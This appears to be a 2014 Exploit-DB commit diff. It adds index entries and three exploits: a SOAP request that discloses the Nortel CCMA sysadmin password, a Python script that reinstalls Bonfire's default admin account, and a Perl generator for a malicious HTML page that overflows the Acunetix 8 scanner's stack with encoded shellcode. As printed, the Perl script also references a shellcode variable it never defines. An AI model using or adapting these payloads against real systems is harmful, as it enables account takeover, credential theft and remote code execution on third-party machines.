Updated 04_25_2014

files.csv

@@ -29739,3 +29739,7 @@ id,file,description,date,author,platform,type,port
 32993,platforms/php/webapps/32993.txt,"Dacio's Image Gallery 1.6 Multiple Remote Vulnerabilities",2009-05-11,ahmadbady,php,webapps,0
 32994,platforms/multiple/remote/32994.xml,"Apple Safari <= 3.2.2 'feed:' URI Multiple Input Validation Vulnerabilities",2009-05-12,"Billy Rios",multiple,remote,0
 32995,platforms/linux/dos/32995.txt,"Sendmail 8.12.x 'X-header' Remote Heap Buffer Overflow Vulnerability",2009-05-27,"Simple Nomad",linux,dos,0
+32996,platforms/multiple/remote/32996.txt,"Nortel Contact Center Manager Administration Password Disclosure Vulnerability",2009-05-14,"Bernhard Muller",multiple,remote,0
+32997,platforms/windows/remote/32997.pl,"Acunetix 8 build 20120704 - Remote Stack Based Overflow",2014-04-24,An7i,windows,remote,0
+32998,platforms/multiple/remote/32998.c,"Heartbleed OpenSSL - Information Leak Exploit (2) - DTLS Support",2014-04-24,"Ayman Sagy",multiple,remote,0
+32999,platforms/php/webapps/32999.py,"Bonefire v.0.7.1 - Reinstall Admin Account Exploit",2014-04-24,"Mehmet Dursun Ince",php,webapps,0

platforms/multiple/remote/32996.txt

@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/34964/info
+
+Nortel Contact Center Manager Administration is prone to a password-disclosure vulnerability caused by a design error.
+
+Attackers can exploit this issue to gain access to the 'sysadmin' password. Successfully exploiting this issue may lead to other attacks. 
+
+POST /Common/WebServices/SOAPWrapperCommon/SOAPWrapperCommonWS.asmx
+HTTP/1.1
+Host: 10.1.2.3
+Content-Type: text/xml; charset=utf-8
+SOAPAction:
+"http://www.example.com/SOAPWrapperCommon_UsersWS_GetServers_Wrapper"
+Content-Length: 661
+
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <SOAPWrapperCommon_UsersWS_GetServers_Wrapper
+xmlns="http://SoapWrapperCommon.CCMA.Applications.Nortel.com">
+      <ccmaUserName>string</ccmaUserName>
+      <clientIP>string</clientIP>
+      <componentID>string</componentID>
+      <sessionID>string</sessionID>
+      <strUserID>string</strUserID>
+      <strPassword>string</strPassword>
+    </SOAPWrapperCommon_UsersWS_GetServers_Wrapper>
+  </soap:Body>
+</soap:Envelope>

platforms/php/webapps/32999.py

@@ -0,0 +1,50 @@
+#!/usr/bin/env python
+# coding: utf-8
+#
+# Bonefire v.0.7.1 Reinstall Admin Account Exploit
+#
+# Author : Mehmet INCE
+# 
+# Analysis write-up : http://www.mehmetince.net/ci-bonefire-reinstall-admin-account-vulnerability-analysis-exploit/
+#
+# Description : 
+# Forgotten controls lead to call install module which lead to
+# create default administrator account again!
+#
+# TIMELINE
+# 21 Apr 2014 14:00 –Vulnerability found
+# 23 Apr 2014 21:20 – Analysis and write-up completed
+# 23 Apr 2014 21:29 – First contact with lead developer of Bonfire
+# 23 Apr 2014 21:33 – Response from lead developer
+# 23 Apr 2014 21:52 – Vulnerability confirmed by lead developer
+# 23 Apr 2014 21:55 – Vulnerability has been patched via following commit
+# https://github.com/ci-bonfire/Bonfire/commit/9cb76c66babf89952c3d48279b026c59e198f46e
+
+import urllib2
+import sys
+import re
+target = sys.argv[1]
+path = sys.argv[2]
+
+if len(sys.argv) > 3:
+     print "Usage : python bonfire www.target.com /path/"
+     exit(0) 
+
+content = urllib2.urlopen(target+path+"index.php/install/do_install").read()
+
+if re.search('[admin@mybonefire.com]', content):
+     print "Target is vulnerable!"
+     print "Username : admin@mybonefire.com"
+     print "Password : password"
+else:
+     print "Target is not vulnerable..."
+
+
+
+
+
+
+
+
+
+

platforms/windows/remote/32997.pl

@@ -0,0 +1,81 @@
+# Exploit Title: Acunetix Stack Based overflow
+# Date: 24/04/14
+# Exploit Author: Danor Cohen (An7i) - http://an7isec.blogspot.co.il/2014/04/pown-noobs-acunetix-0day.html
+# Vendor Homepage: http://www.acunetix.com/
+# Software Link: http://www.acunetix.com/vulnerability-scanner/download/
+# Version: 8 build 20120704
+# Tested on: XP
+
+#This exploit generates HTML file, if this HTML will be scanned with ACUNETIX, shell will be executed.
+ 
+my $file= "index.html";
+my $HTMLHeader1 = "<html>\r\n";
+my $HTMLHeader2 = "\r\n</html>";
+my $IMGheader1 = "<img style=\"opacity:0.0;filter:alpha(opacity=0);\" src=http://";
+my $IMGheader2 = "><br>\n";
+
+my $DomainName1 = "XSS";
+my $DomainName2 = "CSRF";
+my $DomainName3 = "DeepScan";
+my $DomainName4 = "NetworkScan";
+my $DomainName5 = "DenialOfService";
+my $GeneralDotPadding = "." x 190;
+
+my $ExploitDomain = "SQLInjection";
+my $DotPadding = "." x (202-length($ExploitDomain));
+my $Padding1 = "A"x66;
+my $Padding2 = "B"x4;
+my $FlowCorrector = "500f"; #0x66303035 : readable memory location for fixing the flow
+my $EIPOverWrite = "]Qy~"; #0x7e79515d (JMP ESP from SXS.DLL).
+
+# windows/exec - 461 bytes
+# http://www.metasploit.com
+# Encoder: x86/alpha_upper
+# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
+# CMD=calc.exe
+my $shellcode2 =
+"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a" .
+"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48" .
+"\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51" .
+"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43" .
+"\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x39\x33\x30\x45\x50\x53" .
+"\x30\x33\x50\x4c\x49\x4a\x45\x46\x51\x48\x52\x52\x44\x4c" .
+"\x4b\x36\x32\x50\x30\x4c\x4b\x51\x42\x34\x4c\x4c\x4b\x51" .
+"\x42\x35\x44\x4c\x4b\x52\x52\x37\x58\x54\x4f\x48\x37\x51" .
+"\x5a\x57\x56\x50\x31\x4b\x4f\x46\x51\x4f\x30\x4e\x4c\x37" .
+"\x4c\x45\x31\x33\x4c\x45\x52\x36\x4c\x47\x50\x59\x51\x58" .
+"\x4f\x54\x4d\x53\x31\x49\x57\x4d\x32\x4c\x30\x50\x52\x46" .
+"\x37\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x30\x42\x57\x4c\x45" .
+"\x51\x4e\x30\x4c\x4b\x57\x30\x34\x38\x4b\x35\x59\x50\x42" .
+"\x54\x31\x5a\x53\x31\x48\x50\x36\x30\x4c\x4b\x37\x38\x52" .
+"\x38\x4c\x4b\x46\x38\x51\x30\x43\x31\x49\x43\x4a\x43\x47" .
+"\x4c\x47\x39\x4c\x4b\x56\x54\x4c\x4b\x45\x51\x48\x56\x36" .
+"\x51\x4b\x4f\x56\x51\x39\x50\x4e\x4c\x39\x51\x38\x4f\x54" .
+"\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x43\x45\x4a\x54\x35" .
+"\x53\x53\x4d\x4b\x48\x57\x4b\x43\x4d\x57\x54\x34\x35\x5a" .
+"\x42\x31\x48\x4c\x4b\x56\x38\x37\x54\x33\x31\x48\x53\x32" .
+"\x46\x4c\x4b\x34\x4c\x50\x4b\x4c\x4b\x56\x38\x35\x4c\x43" .
+"\x31\x58\x53\x4c\x4b\x43\x34\x4c\x4b\x43\x31\x4e\x30\x4b" .
+"\x39\x51\x54\x31\x34\x56\x44\x51\x4b\x51\x4b\x43\x51\x36" .
+"\x39\x51\x4a\x30\x51\x4b\x4f\x4b\x50\x50\x58\x51\x4f\x30" .
+"\x5a\x4c\x4b\x54\x52\x4a\x4b\x4b\x36\x31\x4d\x33\x5a\x53" .
+"\x31\x4c\x4d\x4b\x35\x4f\x49\x55\x50\x35\x50\x35\x50\x46" .
+"\x30\x42\x48\x36\x51\x4c\x4b\x32\x4f\x4b\x37\x4b\x4f\x58" .
+"\x55\x4f\x4b\x4b\x50\x45\x4d\x36\x4a\x34\x4a\x43\x58\x4e" .
+"\x46\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x39\x45\x57\x4c\x43" .
+"\x36\x43\x4c\x44\x4a\x4d\x50\x4b\x4b\x4d\x30\x42\x55\x34" .
+"\x45\x4f\x4b\x30\x47\x54\x53\x34\x32\x42\x4f\x52\x4a\x33" .
+"\x30\x51\x43\x4b\x4f\x59\x45\x45\x33\x33\x51\x52\x4c\x35" .
+"\x33\x46\x4e\x35\x35\x53\x48\x52\x45\x45\x50\x41\x41";
+
+my $FinalDomainName1 = $IMGheader1.$DomainName1.$GeneralDotPadding.$IMGheader2;
+my $FinalDomainName2 = $IMGheader1.$DomainName2.$GeneralDotPadding.$IMGheader2;
+my $FinalDomainName3 = $IMGheader1.$DomainName3.$GeneralDotPadding.$IMGheader2;
+my $FinalDomainName4 = $IMGheader1.$DomainName4.$GeneralDotPadding.$IMGheader2;
+my $FinalDomainName5 = $IMGheader1.$DomainName5.$GeneralDotPadding.$IMGheader2;
+
+my $FinalExploitDomain = $IMGheader1.$ExploitDomain.$DotPadding.$Padding1.$FlowCorrector.$Padding2.$EIPOverWrite.$shellcode.$IMGheader2;
+open($FILE,">$file");
+print $FILE $HTMLHeader1.$FinalDomainName1.$FinalDomainName2.$FinalDomainName3.$FinalDomainName4.$FinalDomainName5.$FinalExploitDomain.$HTMLHeader2;
+close($FILE);
+print "Acunetix Killer File Created successfully\n";